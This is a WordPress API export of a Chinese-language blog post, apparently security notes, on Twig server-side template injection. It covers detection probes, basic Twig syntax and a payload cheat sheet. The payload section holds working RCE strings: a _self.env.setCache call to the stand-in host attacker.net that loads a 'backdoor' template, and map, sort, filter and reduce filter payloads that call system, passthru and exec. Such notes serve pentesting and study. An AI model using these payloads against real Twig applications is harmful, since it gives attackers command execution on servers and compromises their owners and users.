{"id":73,"date":"2026-03-14T22:34:52","date_gmt":"2026-03-14T14:34:52","guid":{"rendered":"http:\/\/47.118.30.30\/?p=73"},"modified":"2026-03-15T11:40:25","modified_gmt":"2026-03-15T03:40:25","slug":"twig%e6%a8%a1%e6%9d%bf%e6%b3%a8%e5%85%a5","status":"publish","type":"post","link":"https:\/\/arknight.wiki\/index.php\/2026\/03\/14\/twig%e6%a8%a1%e6%9d%bf%e6%b3%a8%e5%85%a5\/","title":{"rendered":"Twig\u6a21\u677f\u6ce8\u5165"},"content":{"rendered":"<h1>Twig\u6a21\u677f\u6ce8\u5165<\/h1>\n<h2>\u5224\u65ad\uff1a<\/h2>\n<p>\u63a2\u6d4b\u5185\u7f6e\u53d8\u91cf <code>_self<\/code>\u3001<code>_context<\/code><\/p>\n<pre><code>{{ _self }}\n{{ _context }}<\/code><\/pre>\n<p>\u89c2\u5bdf\u9519\u8bef\u4fe1\u606f<\/p>\n<pre><code>{{ ''.__class__ }}        \/\/ Jinja2\/Python \u98ce\u683c \u2192 \u62a5\u9519\u542b \"Undefined property __class__\"\n{{ ''.__class__() }}      \/\/ Python \u7279\u6709\n{{ ''['test'] }}          \/\/ Twig \u53ef\u80fd\u62a5 \"Unsupported operand types\"<\/code><\/pre>\n<p>\u5229\u7528 Twig \u7279\u6709 RCE \u8f7d\u8377\u6d4b\u8bd5<\/p>\n<pre><code>{{ _self.env.setCache(\"...\") }}           \/\/ \u65e7\u7248 Twig RCE \u7279\u5f81\n{{ _self.env.loadTemplate(\"...\") }}<\/code><\/pre>\n<h2>\u57fa\u672c\u8bed\u6cd5\uff1a<\/h2>\n<p><code>{{}}<\/code>\u5185\u662f\u8868\u8fbe\u5f0f\uff0c\u4f1a\u8f93\u51fa\uff0c<code>{%%}<\/code>\u5185\u662f\u63a7\u5236\u903b\u8f91\u8bed\u53e5\uff0c\u4e0d\u8f93\u51fa<\/p>\n<p><code>{%%}<\/code>\u652f\u6301\u7684\u903b\u8f91\u8bed\u53e5\uff1a<\/p>\n<pre><code>\u8d4b\u503c\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0set\n\u6761\u4ef6\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if \/ elseif \/ else \/ endif\n\u5faa\u73af\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0for \/ endfor \/ loop \u53d8\u91cf\n\u7ee7\u627f\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0extends \/ block \/ endblock\n\u5305\u542b\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0include\n\u5b8f\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0  macro \/ import \/ from\n\u7a7a\u767d\u63a7\u5236\u00a0\u00a0\u00a0- \u4fee\u9970\u7b26\uff08\u5982 {%- \u6216 -%}\uff09\n\u6269\u5c55\u529f\u80fd\u00a0\u00a0\u00a0sandbox, cache, embed \u7b49\uff08\u9700\u542f\u7528\uff09<\/code><\/pre>\n<h2>payload\uff1a<\/h2>\n<p>\u5229\u7528_self.:<\/p>\n<pre><code>{{_self.env.setCache(\"ftp:\/\/attacker.net:2121\")}}{{_self.env.loadTemplate(\"backdoor\")}}\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/\u6539\u53d8\u8def\u5f84\u5b9e\u73b0\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\n<\/code><\/pre>\n<p>\u5229\u7528map\u8fc7\u6ee4\u5668\uff1a<\/p>\n<pre><code>{{[\"cmd\"]|map(\"system\")}}\n{{[\"cmd\"]|map(\"passthru\")}}\n{{[\"cmd\"]|map(\"exec\")}}    \/\/ \u65e0\u56de\u663e<\/code><\/pre>\n<p>\u5229\u7528sort\u8fc7\u6ee4\u5668\uff1a<\/p>\n<pre><code>{{[\"cmd\", 0]|sort(\"system\")}}\n{{[\"cmd\", 0]|sort(\"passthru\")}}\n{{[\"cmd\", 0]|sort(\"exec\")}}    \/\/ \u65e0\u56de\u663e<\/code><\/pre>\n<p>\u5229\u7528filter\u8fc7\u6ee4\u5668\uff1a<\/p>\n<pre><code>{{[\"cmd\"]|filter(\"system\")}}\n{{[\"cmd\"]|filter(\"passthru\")}}\n{{[\"cmd\"]|filter(\"exec\")}}    \/\/ \u65e0\u56de\u663e<\/code><\/pre>\n<p>\u5229\u7528reduce\u8fc7\u6ee4\u5668\uff08\u6267\u884c\u4e24\u6b21\uff09\uff1a<\/p>\n<pre><code>{{[0, 0]|reduce(\"system\", \"cmd\")}}\n{{[0, 0]|reduce(\"passthru\", \"cmd\")}}\n{{[0, 0]|reduce(\"exec\", \"cmd\")}}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Twig\u6a21\u677f\u6ce8\u5165 \u5224\u65ad\uff1a \u63a2\u6d4b\u5185\u7f6e\u53d8\u91cf _self\u3001_context {{ _self }} {{ _cont [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-73","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/73","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/comments?post=73"}],"version-history":[{"count":1,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/73\/revisions"}],"predecessor-version":[{"id":96,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/73\/revisions\/96"}],"wp:attachment":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/media?parent=73"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/categories?post=73"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/tags?post=73"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}